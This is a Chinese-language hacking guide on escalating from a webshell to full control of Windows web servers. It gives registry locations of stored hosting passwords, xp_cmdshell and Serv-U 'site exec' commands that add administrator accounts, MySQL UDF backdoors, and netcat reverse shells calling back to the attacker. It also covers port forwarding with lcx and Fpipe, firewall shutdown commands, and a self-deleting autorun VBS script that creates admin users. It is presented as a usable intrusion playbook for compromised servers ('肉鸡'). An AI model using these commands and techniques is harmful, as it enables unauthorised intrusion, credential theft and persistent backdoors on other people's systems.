HKEY_CURRENT_USERSoftwarePremiumSoftNavicatServers mysql管理工具Navicat的注册表位置，提权运用请谷歌
HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters Radmin的配置文件，提权中常将其导出进行进行覆盖提权
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual Roots IIS注册表全版本泄漏用户路径和FTP用户名漏洞
HKEY_LOCAL_MACHINEsoftwarehzhostconfigSettingsmastersvrpass 华众主机在注册表中保存的mssql、mysql等密码
HKEY_LOCAL_MACHINESYSTEMLIWEIWENSOFTINSTALLFREEADMIN11 星外主机mssql的sa账号密码，双MD5加密
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesMSFtpsvcParametersVirtual RootsControlSet002 星外ftp的注册表位置，当然也包括ControlSet001、ControlSet003


(( wscript.shell的删除和恢复 ))


载wscript.shell对象，在cmd下或直接运行：regsvr32 /u %windir%system32WSHom.Ocx


卸载FSO对象，在cmd下或直接运行：regsvr32.exe /u %windir%system32scrrun.dll


卸载stream对象，在cmd下或直接运行：regsvr32 /s /u “CrogramFilesCommonFilesSystemadomsado15.dll”


如果想恢复的话只需要去掉/U 即可重新再注册以上相关ASP组件，这样子就可以用了


(( 如何找到准确的终端连接端口？))


在aspx大马里，点击“系统信息”第三个就是目前的3389端口


或是执行命令查看正在运行的服务：tasklist /svc


找到：svchost.exe 1688 TermService


记住1688这个ID值，


查看开放的所有端口：netstat -ano


找到1688这个ID值所对应的端口就是3389目前的端口


(( iis6提权提示Can not find wmiprvse.exe的突破方法 ))


突破方法一：


在IIS环境下，如果权限做得不严格，我们在aspx大马里面是有权限直接结束wmiprvse.exe进程的，进程查看里面直接K掉


在结束之后，它会再次运行，这时候的PID值的不一样的。这时候我们回来去运行exp，直接秒杀。




突破方法二：


虚拟主机，一般权限严格限制的，是没权限结束的，这时候我们可以考虑配合其他溢出工具让服务器强制重启，比如“直接使服务器蓝屏重启的东东”


甚至可以暴力点，DDOS秒杀之，管理发现服务器不通了首先肯定是以为服务器死机，等他重启下服务器（哪怕是IIS重启下）同样秒杀之。


(( 本地溢出提权 ))


计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.


缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.


利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.


想要执行cmd命令，就要wscript.shell组建支持，或是支持aspx脚本也行，因为aspx脚本能调用.net组件来执行cmd的命令.


(( sa提权 ))


扫描开放的端口，1433开了就可以找sa密码提权，用大马里的搜索文件功能，sa密码一般在conn.asp config.asp web.config 这三个文件


也可以通过注册表找配置文件，看下支持aspx不，支持的话跨目录到别的站点上找，找到之后用aspshell自带的sql提权登录再执行命令创建用户即可。


aspx马提权执行命令有点不一样，点击数据库管理–选MSSQL–server=localhost;UID=saWD=;database=masterrovider=SQLOLEDB–输入帐号密码连接即可


增加一个用户：exec master.dbo.xp_cmdshell ‘net user jianmei daxia.asd /add’;–
提升为管理员：exec master.dbo.xp_cmdshell ‘net localgroup administrators jianmei /add’;–


PS:如果增加不上，说明是xp_cmdshell组建没有，增加xp_cmdshell组建：Use master dbcc addextendedproc(‘xp_cmdshell’,’xplog70.dll’)


(( root提权 ))


利用mysql提权的前提就是,服务器安装了mysql,mysql的服务没有降权,是默认安装以系统权限继承的(system权限). 并且获得了root的账号密码


如何判断一台windows服务器上的mysql有没有降权？
cmd命令net user 如果存在 mysql mssql这样用户或者类似的.通常就是它的mssql mysql服务已经被降权运行了


如何判断服务器上是否开启了mysql服务？
开了3306端口，有的管理员会把默认端口改掉.另一个判断方法就是网站是否支持php,一般支持的话都是用mysql数据库的.


如何查看root密码？
在mysql的安装目录下找到user.myd这个文件，root就藏在里面，一般是40位cmd加密，一些php网站安装的时候用的是root用户,在conn.asp config.asp这些文件里。
有时会显得很乱，这时就需要自己去组合，前17位在第一行可以找到，还有23位在第三行或是其他行，自己继续找。


可以直接用php脚本里“mysql执行”，或是上传个UDF.php，如果网站不支持PHP，可以去旁一个php的站，也可以把UDF.php上传到别的phpshell上也可以。


填入帐号密码之后，自然就是安装DLL了，点击“自动安装Mysql BackDoor” 显示导出跟创建函数成功后，紧接着执行增加用户的命令即可。


注意：5.0版本以下(包括5.0的)默认c:windows系统目录就可以了，5.1版本以上的不能导出到系统目录下创建自定义函数，只能导出在mysql安装目录下的lib/plugin目录中


例如：D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll


如果密码看不见，或是组合不到40位，就本地安装一个mysql吧，
1、停止mysql服务
2、替换下载下来的3个文件（user.MYI user.MYD user.frm）
3、cmd切换到bin目录下，进入mysql安全模式，cmd命令：mysqld-nt –skip-grant-tables
4、重新打开一个cmd 切换到bin目录下，cmd命令：mysql -u root 版本不同有可能是：mysql -uroot -proot
5、最后查询一下就出来了select user,password from mysql.user;


(( serv-u提权 ))


这个文件里包含serv-u的md5密码：Crogram FilesRhinoSoft.comServ-U\ServUDaemon.ini


找到这个文件：ServUDaemon.ini 打开找到：LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2


再拿md5密文去解密，再用现在的密码登陆提权即可。


serv-u提权的前提是43958端口开了，且知道帐号密码！


如果帐号密码默认，直接用shell里面的serv-u提权功能即可搞定，建议用aspx马、php马去提权，因为可以看回显。


530说明密碼不是默认的,回显330说明成功，900说明密码是默认的……………..


在程序里找个快捷方式，或是相关的文件进行下载到本地，再查看文件的属性，就可以找到serv-u的安装目录了。


目录有修改权限之serv-u提权：


找到serv-u的目录，再找到用户的配置文件ServUDaemon.ini，直接增加一个用户代码，保存！


接着本地cmd命令：ftp 服务器ip


回车，输入帐号密码再回车………………….


接着先试试普通的cmd命令提权，不行的话就使用ftp提权的命令：


Quote site exec net user jianmei daxia /add 增加一个用户


Quote site exec net localgroup administrators jianmei /add 提升到管理员权限


200 EXEC command successful (TID=33). 执行成功的回显信息


Maintenance=System 权限类型多加一行指定新加帐号为系统管理员


ReloadSettings=True 在修改ini文件后需加入此项，这时serv-u会自动刷新配置文件并生效


(( 端口转发 ))


什么情况下适合转发端口？


1.服务器是内网，我们无法连接。
2.服务器上有防火墙，阻断我们的连接。


转发端口的前提，我们是外网或是有外网服务器。


找个可读可写目录上传lcx.exe


本地cmd命令：lcx.exe -listen 1988 4567 （监听本地1988端口并转发到4567端口）


接着shell命令：/c c:windowstempcookieslcx.exe -slave 本机ip 1988 服务器ip 3389 （把服务器3389端口转发到本地4567端口）


之后本地连接：127.0.0.1:4567 (如果不想加上:4567的话，本地执行命令的时候，把4567换成3389来执行就行了)


以上是本机外网情况下操作，接着说下在外网服务器里如何操作：


上传lxc.exe cmd.exe到服务器且同一目录，执行cmd.exe命令：lcx.exe -listen 1988 4567


接着在aspxshell里点击端口映射，远程ip改为站点的ip，远端口程填1988，点击映射端口，接着在服务器里连接127.0.0.1:4567就可以了。


(( nc反弹提权 ))


当可以执行net user，但是不能建立用户时，就可以用NC反弹提权试下，特别是内网服务器，最好用NC反弹提权。


不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口，那么这种方法也失效了….


找个可读可写目录上传nc.exe cmd.exe




-l 监听本地入栈信息


-p port打开本地端口


-t 以telnet形式应答入栈请求


-e 程序重定向


本地cmd执行：nc -vv -l -p 52 进行反弹


接着在shell里执行命令：c:windowstempnc.exe -vv 服务器ip 999 -e c:windowstempcmd.exe 最好是80或8080这样的端口，被防火墙拦截的几率小很多


执行成功后本地cmd命令：cd/ （只是习惯而已）


接着以telnet命令连接服务器：telnet 服务器ip 999


回车出现已选定服务器的ip就说明成功了，接着权限比较大了，尝试建立用户！


坏蛋：
本地cmd执行：nc -vv -l -p 52 进行反弹
c:windowstempnc.exe -e c:windowstempcmd.exe 服务器ip 52


低调小飞：
shell执行命令c:windowstempnc.exe -l -p 110 -t -e c:windowstempcmd.exe




一般这样的格式执行成功率很小，不如直接在cmd那里输入：c:windowstempnc.exe 命令这里输入：-vv 服务器ip 999 -e c:windowstempcmd.exe


这个技巧成功率比上面那个大多了，不单单是nc可以这样，pr这些提权exp也是可以的。


(( 星外提权 ))


如何知道是不是星外主机？


第一：网站物理路径存在“freehost”
第二：asp马里点击程序，存在“7i24虚拟主机管理平台”“星外主机”之类的文件夹


默认帐号：freehostrunat
默认密码：fa41328538d7be36e83ae91a78a1b16f!7


freehostrunat这个用户是安装星外时自动建立的，已属于administrators管理组，而且密码不需要解密，直接登录服务器即可


星外常写目录：


C:RECYCLER
C:windowstemp
e:recycler
f:recycler
C:phpPEAR
C:WINDOWS7i24.comFreeHost
C:phpdev
C:System Volume Information
C:7i24.comserverdoctorlog
C:WINDOWSTemp
c:windowshchiblis.ibl
C:7i24.comiissafelog
C:7i24.comLinkGatelog
Crogram FilesThunder NetworkThunder7
C:Program FilesThunder NetworkThunder
C:Program FilesSymantec AntiVirusSAVRT
c:windowsDriverPacksCAM2
C:Program FilesFlashFXP
c:Program FilesMicrosoft SQL Server90SharedErrorDumps
C:Program FilesZendZendOptimizer-3.3.0
C:Program FilesCommon Files
cocuments and SettingsAll UsersApplication DataHagel TechnologiesDU Meterlog.csv
c:Program Files360360SafedeepscanSectionmutex.db
c:Program FilesHeliconISAPI_Rewrite3error.log
c:Program FilesHeliconISAPI_Rewrite3Rewrite.log
c:Program FilesHeliconISAPI_Rewrite3httpd.conf
c:Program FilesCommon FilesSymantec SharedPersist.bak
c:Program FilesCommon FilesSymantec SharedValidate.dat
c:Program FilesCommon FilesSymantec SharedValidate.dat
C:Program FilesZendZendOptimizer-3.3.0docs
Cocuments and SettingsAll UsersDRM
Cocuments and SettingsAll UsersApplication DataMcAfeeDesktopProtection
Cocuments and SettingsAll UsersApplication Data360safesoftmgr
C:Program FilesZendZendOptimizer-3.3.0libOptimizer-3.3.0php-5.2.xZendOptimizer.dll
Cocuments and SettingsAll UsersApplication DataMicrosoftMedia Index




ee提权法：


找个可读可写目录上传ee.exe


cmd命令：/c c:windowstempcookiesee.exe -i （获取星外帐号的id值，例如回显：FreeHost ID：724）


接着命令：/c c:windowstempcookiesee.exe -u 724 （获取星外的帐号密码）




vbs提权法：


找个可读可写目录上传cscript.exe iispwd.vbs


cmd命令：/c “c:windowstempcookiescscript.exe” c:windowstempcookiesiispwd.vbs


意思是读取iis，这样一来，不但可以获取星外的帐号密码，还可以看到同服务器上的所有站点的目录。




可行思路大全：


经测试以下目录中的文件权限均为everyone，可以修改，可以上传同文件名替换，删除，最重要的是还可以执行：


360杀毒db文件替换:
c:Program Files360360SDdeepscanSectionmutex.db
c:Program Files360360SafedeepscanSectionmutex.db
C:Program Files360360SafeAntiSectionmutex.db


IISrewrite3 文件替换：
C:Program FilesHeliconISAPI_Rewrite3Rewrite.log
C:Program FilesHeliconISAPI_Rewrite3httpd.conf
C:Program FilesHeliconISAPI_Rewrite3error.log


诺顿杀毒文件替换:
c:Program FilesCommon FilesSymantec SharedPersist.bak
c:Program FilesCommon FilesSymantec SharedValidate.dat
c:Program FilesCommon FilesSymantec SharedPersist.Dat


一流过滤相关目录及文件：
C:7i24.comiissafelogstartandiischeck.txt
C:7i24.comiissafelogscanlog.htm


其他:
Zend文件替换：C:Program FilesZendZendOptimizer-3.3.0libOptimizer-3.3.0php-5.2.xZendOptimizer.dll
华盾文件替换：C:WINDOWShchiblis.ibl
Flash文件替换：C:WINDOWSsystem32MacromedFlashFlash10q.ocx
DU Meter流量统计信息日志文件替换：c:Documents and SettingsAll UsersApplication DataHagel TechnologiesDU Meterlog.csv


(( 360提权 ))


找个可读可写目录上传360.exe


cmd命令：/c c:windowstempcookies360.exe


会提示3段英文：


360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2


You will get a Shift5 door!


Shift5 Backdoor created!


这是成功的征兆，接着连接服务器连按5下shift键，将弹出任务管理器，点击新建任务：explorer.exe 会出现桌面，接下来大家都会弄了……


(( 搜狗提权 ))


搜狗的目录默认是可读可写的，搜狗每隔一段时间就会自动升级，而升级的文件是pinyinup.exe


我们只要把这个文件替换为自己的远控木马，或是添加账户的批处理，等搜狗升级的时候，就可以达成我们的目的了。


(( 华众虚拟主机提权 ))


就经验来说，一般溢出提权对虚拟主机是无果的，而且华众又没有星外那么明显的漏洞。


所以华众提权关键之处就是搜集信息，主要注册表位置：


HKEY_LOCAL_MACHINESOFTWAREHZHOSTCONFIG
HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmysqlpass root密码
HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmssqlpss sa 密码


c:windowstemp 下有hzhost主机留下的ftp登陆记录有用户名和密码


以上信息配合hzhosts华众虚拟主机系统6.x 破解数据库密码工具使用


百度搜索：hzhosts华众虚拟主机系统6.x 破解数据库密码工具




(( N点虚拟主机 ))


N点虚拟主机管理系统默认数据库地址为：host_date#host # date#.mdb


rl直接输入不行 这里咱们替换下 #=# 空格=


修改后的下载地址为/host_date/#host # date#196.mdb


N点数据库下载之后找到sitehost表 FTPuser&FTPpass 值 FTPpass是N点加密数据然后用N点解密工具解密得到FTP密码


N点默认安装路径C:Program FilesNpointSoftnpointhostweb
D:Program FilesNpointSoftnpointhostweb
默认权限可读。遇到对方所用虚拟主机是N点时候 可以考虑 读取该文件夹下载数据库


提权成功后3389连接不上的几种解决办法（来自七行）：

有时候我们入侵提完权后，3389端口开了，可还是没办法连3389，这是非常蛋疼的一件事。连不上通常用以下几种可能以及对应的解决办法。 提供一些思路和方法。


方法一：网站服务器在内网。


1，用lcx转发在后连接


2，上神器reDuh ，貌似现在有GUI版的，更方便了。


方法二：做了tcp/ip筛选。


1，把端口转为TCP/IP里设置的只允许连接的端口其中一个。


2，用EvilCat取消端口限制


3，用regedit -e导出HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpipParameters
HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpipParameters
HKEY_LOCAL_MACHINESYSTEMControlSet003ServicesTcpipParameters
以上三个键值,本地修改把EnableSecurityFilters值改成dword:00000000在导入覆盖。


方法三：服务器做了ip安全策略或windows自带防火墙。


1，执行cmd命令： cmd /c net stop policyagent 停掉IPSEC Services。


2，执行cmd /c net stop sharedaccess停掉windows自带的防火墙，然后再连3389。


方法四：管理员设置的终端登陆权限只有指定的用户可以登入。


1、在cmd下把你登陆的用户名加入远程桌面用户组，即remote desktop users


2，命令关掉设置权限的服务


方法五：防火墙。


1，这个可以将3389转发到80等常用端口，貌似还有个工具可以自动停止iis，将3389转到80上，不过不推荐这种，万一失败，后果你们都知道的。


2，找到进程关掉就行了，第三点有讲。


3，还是3389转发。上传Fpipe.exe
cmdshell下运行 Fpipe.exe -v -l 1234 -r 3389 127.0.0.1 命令很简单，监听1234端口，本地连3389然后，mstsc /v:肉机IP:1234/console 连接就行了。

方法六：超出服务器最大连接数


1，这个就网上下载个突破3389最大连接数的工具


2，运行以下命令：
mstsc /console /v:服务器IP:远程端口
或者
mstsc /admin /v:服务器IP:远程端口

思路：

1，SER-TU提权（通常是利用SERFTP服务器管理工具，首先要在安装目录下找到INI配置文件，必须具备可写入的权限）
2，RADMIN提权（大家并不陌生，我们在扫描4899空口令后，同样需要他来连接）
3，PCANYWHRER提权（也是远程客户端软件，下载安装目录的CIF文件进行破解）
4，SAM提权（SAM系统帐户，通常需要下载临时存放的SAM文件，然后进行HASH破解）
5，NC提权（利用NC命令，反弹一个端口，然后TELNET远程去连接一个端口，虽然权限不够大，结合巴西烤肉，能够成功的）
6，PR提权（PR提权，这个就不多说了，最好是免杀的PR大杀器，这样更方面我们去操作）
7，IIS提权（IIS6.0提权，首先需要获取IIS的配置信息，利用工具进行添加后门用户）
8，43958提权（如果SER-TU有直接读入和执行的权限，那么我们就可以直接提权）
9，PERL提权（PERL提权通常是针对PERL文件夹下的提权方式，利用DIR目录%20NET USER这样来建立后门用户）
10，内网LCX提权（转发工具LCX，通常需要先本地监听一个端口，然后转发，针对内网，用本地的127连接对方的3389）
11，启动提权（如果服务器启动项有能够执行的权限，那么应该说管理员的技术肯定不精湛）
12，替换服务提权（替换某个服务EXE，比如SER-TU，可将原有的删除，再传一个同样的SER.EXE上去，等待服务器重启）
13，FXP提权（FXP这个工具其实本身他是一个传输工具，但我们可以下载他的三个文件，然后，用密码查看器的功能去获得密码）
14，输入法提权（目前来说的话，输入法提权的思路基本上不太可行了）
15，360提权（360提权，也就是我们常说的SHIFT后门，如果执行了360漏洞利用程序，连接服务器用SHIFT5下，弹出了CMDSHELL即为
成功）
16，VNC提权（VNC，想必大家并不陌生，我们通常是扫描5900国外服务器时候用到VNC来连接的，同样，我们如果得到了VNC的密码，
通常可以利用他来提权）
17，2003ODAY提权（如果服务器是2003的，那么就可以利用2003ODAY利用工具来进行提权了）
18，ROOT提权（如果你获得了MSSQL的密码，那么就可以导入注册表的方式，利用MSSQL语句执行我们想要的命令了）
19，SA密码服务器提权（通常去寻找SA，MSSQL的相关密码，比如CONFIG.ASP,CONN.ASP等等)
20，FTP溢出提权(这个用到LCX工具，本地溢出，转发一个端口，虽然不是内网，利用默认的21进行提升权限）


方法：



第一，WEBSHELL 权限提升技巧


C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\


看能否跳转到这个目录，如果行那就最好了，直接下它的 CIF 文件，破解得到 pcAnywhere密码，登陆.


c:\ProgramFiles\serv-u\


C:\WINNT\system32\config\


下它的 SAM，破解密码


c:\winnt\system32\inetsrv\data\


是 erveryone完全控制，很多时候没作限制，把提升权限的工具上传上去，然后执行


c:\perl


C:\ProgramFiles\JavaWebStart\


c:\DocumentsandSettings\


C:\DocumentsandSettings\AllUsers\


c:\winnt\system32\inetsrv\data\


c:\ProgramFiles\


c:\ProgramFiles\serv-u\


C:\ProgramFiles\MicrosoftSQLServer\


c:\Temp\


c:\mysql\(如果服务器支持 PHP）


c:\PHP(如果服务器支持 PHP）


运行”cscriptC:\Inetpub\AdminScripts\adsutil.vbsgetw3svc/inprocessisapiapps”来提升权限还可以用这段代码试提升，好象不是很理想的如果主机设置很变态，可以试下在 c:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启动”写入 bat，vbs 等木马。

根目录下隐藏 autorun.inf


C:\PROGRAMFILES\KV2004\


D:\PROGRAMFILES\RISING\RAV\


C:\ProgramFiles\Real\RealServer\


Folder.htt 与 desktop.ini


将改写的 Folder.htt 与 desktop.ini，还有你的木马或者是 VBS 或者是什么，放到对方管理员最可能浏览的目录下replace替换法捆绑脚本编写一个启动/关机脚本重起删 SAM错CAcls 命令FlashFXP 文件夹 Sites.datSites.dat.bakStats.datStats.dat.bak

  


第二，Ring 的权限提升 21大法！


以下全部是本人提权时候的总结 很多方法至今没有机会试验也没有成功，但是我是的确看见别人成功过的。本人不才，除了第一种方法自己研究的，其他的都是别人的经验总结。希望对朋友有帮助！

1.radmin连接法


条件是你权限够大，对方连防火墙也没有。封装个 radmin上去，运行，开对方端口，然后 radmin上去。本人从来米成功过。，端口到是给对方打开了。


2.paanywhere


C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 这里下他的 GIF文件，在本地安装 pcanywhere上去

3.SAM 破解


C:\WINNT\system32\config\ 下他的 SAM 破解之


4.SU密码夺取


C:\Documents and Settings\All Users\「开始」菜单\程序\


引用：Serv-U，然后本地查看属性，知道路径后，看能否跳转进去后，如果有权限修改 ServUDaemon.ini，加个用户上去，密码为空


[USER=WekweN|1]


Password=


HomeDir=c:\


TimeOut=600


Maintenance=System


Access1=C:\|RWAMELCDP


Access1=d:\|RWAMELCDP


Access1=f:\|RWAMELCDP


SKEYvalues=


这个用户具有最高权限，然后我们就可以 ftp上去 quote site exec xxx 来提升权限


5.c:\winnt\system32\inetsrv\data\


引用：就是这个目录，同样是 erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去， 然后执行


6.SU溢出提权


这个网上教程 N 多，不详细讲解了


7.运行 Csript


引用：运行”cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps”来提升权限 用这个 cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

查看有特权的 dll 文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll


再将 asp.dll 加入特权一族asp.dll 是放在 c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)


我们现在加进去


cscript adsutil.vbs set /W3SVC/InProcessIsapiApps ”C:\WINNT\system32\idq.dll”


“C:\WINNT\system32\inetsrv\httpext.dll” ”C:\WINNT\system32\inetsrv\httpodbc.dll”

“C:\WINNT\system32\inetsrv\ssinc.dll” ”C:\WINNT\system32\msw3prt.dll””c:\winnt\system32

\inetsrv\asp.dll”


可以用 cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了


8.脚本提权


c:\Documents and Settings\All Users\「开始」菜单\程序\启动”写入 bat、vbs


9.VNC


这个是小花的文章 HOHO


默认情况下 VNC 密码存放在HKCU\Software\ORL\WinVNC3\Password


我们可以用 vncx4 破解它，vncx4 使用很简单，只要在命令行下输入


c:\>vncx4 -W


然后顺序输入上面的每一个十六进制数据，没输完一个回车一次就行了。


10.NC 提权


给对方来个 NC 但是条件是你要有足够的运行权限 然后把它反弹到自己的电脑上 HOHO OK 了


11.社会工程学之 GUEST提权


很简单 查看他的拥护 一般来说 看到帐户以后 密码尽量猜 可能用户密码一样 也可能是他 QQ 号 邮箱号 手机号 尽量看看 HOHO


12.IPC 空连接


如果对方真比较白痴的话 扫他的 IPC 如果运气好还是弱口令


13.替换服务


这个不用说了吧？个人感觉相当复杂


14.autorun .inf


autorun=xxx.exe 这个=后面自己写 HOHO 加上只读、系统、隐藏属性 传到哪个盘都可以的不相信他不运行


15.desktop.ini 与 Folder.htt


引用：首先，我们现在本地建立一个文件夹，名字不重要，进入它，在空白处点右键，选择“自定义 文件夹”（xp好像是不行的）一直下点，默认即可。完成后，你就会看到在此目录下多了两个名为 Folder setting的文件架与 desktop.ini 的文件，（如果你看不到，先取消”隐藏受保护的操作系统文件”） 然后我们在 Folder setting目录下找到 Folder.htt 文件， 记事本打开，在任意地方加入以下代码：然后你将你的后门文件放在 Folder setting 目录下，把此目录与desktop.ini 一起上传到对方 任意一个目录下，就可以了，只要等管理员浏览了此目录，它就执行了我们的后门。就执行了我们的后门。

16.su覆盖提权


本地安装个 su， 将你自己的 ServUDaemon.ini 文件用从他那下载下来的 ServUDaemon.ini 覆盖掉，重起一下 Serv-U，于是你上面的所有配置都与他的一模一样了

17.SU转发端口


43958 这个是 Serv －U 的本地管理端口。FPIPE.exe 上传他，执行命令： Fpipe–v–l 3333


–r 43958 127.0.0.1 意思是将 4444 端口映射到 43958端口上。 然后就可以在本地安装一个


Serv-u， 新建一个 服务器， IP 填对方 IP， 帐号为 LocalAdministrator 密码为#1@$ak#.1k;0@p


连接上后你就可以管理他的 Serv-u了。


18.SQL帐户密码泄露


如果对方开了 MSSQL 服务器，我们就可以通过用 SQL 连接器加管理员帐号（可以从他的连接数据库的 ASP 文件中看到），因为 MSSQL是默认的 SYSTEM 权限。

引用：对方没有删除 xp_cmdshell 方法：使用 Sqlexec.exe，在 host 一栏中填入对方 IP，User与 Pass 中填入你所得到的用户名与密码。format 选择 xp_cmdshell”%s”即可。然后点击connect，连接上后就可 以在 CMD 一栏中输入你想要的 CMD 命令了

19.asp.dll


引用：因为asp.dll 是放在 c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同) 我们现在加进去


cscript adsutil.vbs set /W3SVC/InProcessIsapiApps ”C:\WINNT\system32\idq.dll”


“C:\WINNT\system32\inetsrv\httpext.dll” ”C:\WINNT\system32\inetsrv\httpodbc.dll”

“C:\WINNT\system32\inetsrv\ssinc.dll” ”C:\WINNT\system32\msw3prt.dll””c:\winnt\system32

\inetsrv\asp.dll”


好了,现在你可以用 cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了,注意,用法中的 get 和 set,一个是查看一个是设置.还有就是你运行上面的你要到C:\Inetpub\AdminScripts>这个目录下.

那么如果你是一个管理员,你的机子被人用这招把 asp 提升为 system 权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用 set 这个命令,覆盖掉刚才的那些东东.

20.Magic Winmail


前提是你要有个 webshell 引用： http://www.eviloctal.com/forum/read.phptid=3587 这里去看吧


21.DBO……


其实 提升权限的方式很多的 就看大家怎么利用了 HOHO 加油吧 将服务器控制到底！


感谢 noangel


  


第三，WEBSHELL 权限提升


动网上传漏洞，相信大家拿下不少肉鸡吧，但是都是WEBSHELL，不能拿到系统权限，要如何拿到系统权限呢？这正是我们这次要讨论的内容OK，进入我的WEBSHELL

啊哈，不错，双 CPU，速度应该跟的上，不拿下你我怎么甘心啊


输入密码，进入到里面看看，有什么好东西没有，翻了下，好像也没有什么特别的东西，看看能不能进到其他的盘符，点了下 C 盘，不错不错，可以进去，这样提升就大有希望了一 serv－u提升

OK，看看他的 PROGRAME 里面有些什么程序，哦，有 SERV-U，记得有次看到 SERV-U有默认的用户名和密码，但是监听的端口是 43958，而且是只有本地才能访问的，但是我们有端口转发工具的啊，不怕。先看看他的 SERV-U的版本是多少，

telnet XXX.XXX.XXX.XXX 21


显示竟然是 3.0 的，唉，不得不说这个管理员真的不称职。后来完毕后扫描了下，也只有FTP 的洞没有补。既然是这样，我们就开始我们的提升权限了


上传 FPIPE，端口转发工具。


在运行 CMD 命令里输入 d:\\wwwroot\\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本机的43598 端口转发到 81端口。然后打开我们自己机子上的 SERV-U，点 Serv－U服务器，点菜单栏上的的服务器， 点新建服务器， 然后输入 IP， 输入端口， 记得端口是刚刚我们转发的 81端口。服务名称随便你喜欢，怎么样都行。

然后是用户名：LocalAdministrator  


密码：#l@$ak#.lk;0@P (密码都是字母)


确定，然后点刚刚建的服务器，然后就可以看到已有的用户，自己新建一个用户，把所有权限加上。也不锁定根目录接下来就是登陆了，登陆 FTP 一定要在 CMD 下登陆，进入后一般命令和DOS 一样，添加用户的时候

ftp>quote site exec net.exe user hk pass /add


ftp>quote site exec net.exe localgroup administrators hk/add


如果对方开了 3389 的话，就不用我教你怎么做了，没开的话，新建立 IPC 连接，在上传木马或者是开启 3389 的工具


二 auto.ini 加 SHELL.VBS


autorun.inf


[autorun]


open=shell.vbs


shell.vbs


dim wsh


set wsh=createObject(“WScript.Shell”)


wsh.run ”net user guest /active:yes”,0


wsh.run ”net user guest 520ls”,0


wsh.run ”net localgroup administrators guest /add”,0


wsh.run ”net user hkbme 520ls /add”,0


wsh.run ”net localgroup administrators hkbme /add”,0


wsh.run ”cmd.exe /c del autorun.inf”,0


wsh.run ”cmd.exe /c del shell.vbs”,0


但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木马程序，还要一个木马程序，但是语句就和最后两句一样，通过 CMD 执行木马程序

三 Folder.htt 与 desktop.ini


将改写的 Folder.htt 与 desktop.ini，还有你的木马或者是 VBS 或者是什么，放到对方管理员


最可能浏览的目录下，觉得一个不够，可以多放几个


Folder.htt 添加代码， 但是后门和这两个文件必须要放到一块， 有点问题， 可以结合启动 VBS，


运行结束后，删除上传的后门.就是 CODEBASE=”shell.vbs”.shell 写法如上


四，replace替换法


替换正在执行的文件。用这个几乎可以马上得到权限，但是我没有做过试验，可以试下，将对方正在执行的文件替换为和它文件名一样的，捆绑了木马的。为什么不直接替换木马呢？如果替换的是关键程序，那不是就直接挂了？所以还是捆绑好点格式

REPLACE [drive1:][path1]filename [drive2:][path2] [/A]


[/R] [/W]


REPLACE [drive1:][path1]filename [drive2:][path2]


[/R] [/S] [/W]


[drive1:][path1]filename 指定源文件。


[drive2:][path2] 指定要替换文件的


目录。


/A 把新文件加入目标目录。不能和


/S 或 /U 命令行开关搭配使用。


/P 替换文件或加入源文件之前会先提示您进行确认。


/R 替换只读文件以及未受保护的文件。


/S 替换目标目录中所有子目录的文件。


不能与 /A 命令选项搭配使用。


/W 等您插入磁盘以后再运行。


/U 只会替换或更新比源文件日期早的文件。


不能与 /A 命令行开关搭配使用


这个命令没有试验过，看能不能替换不能访问的文件夹下的文件，大家可以试验下


五 脚本


编写一个启动/关机脚本配置文件 scripts.ini，这个文件名是固定的，不能改变。内容如下：


[Startup]


0CmdLine=a.bat


0Parameters=


将文件 scripts.ini 保存到”C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts”


A.BAT的内容可以是 NET USER yonghu mima


也可以是NET USER ADMINistrator XXX


这样可以恢复你想要得任意用户名的密码，也可以自己增加新的用户，但是要依赖重启，还有就是对 SYSTEM32 有写的权限


六 SAM


如果可以访问对方的 SYSTEM32 的话，删除对方的 SAM 文件，等他重启以后就是 ADMIN用户密码为空突然又有了想法，可以用 REPLACE 命令替换的吗，可以把你的 SAM 文件提取出来，上传到他的任意目录下，然后替换。不过不知道如果对 SYSTEM32 没有权限访问的话，能不能实现替换

——————————————————————————–


第四，使用 FlashFXP来提升权限


最近各位一定得到不少肉鸡吧，从前段时间的动网的 upfile 漏洞， 动力文章系统最新漏洞到 first see发现的动网 sql 版本的一个超级大漏洞。有人一定忙的不易乐乎，大家的方法也不过是使用一下 asp 脚本的后门罢了。至于提 升权限的问题呵呵，很少有人能作一口气完成。关键还是在提升权限上做个问题上，不少服务器设置的很 BT，你的 asp 木马可能都用不了，还那里来的提升啊。我们得到 webshell 也就是个低级别的用户的权限，各种提升权限方法是可谓五花八门啊，如何提升就看你自己的妙招了。

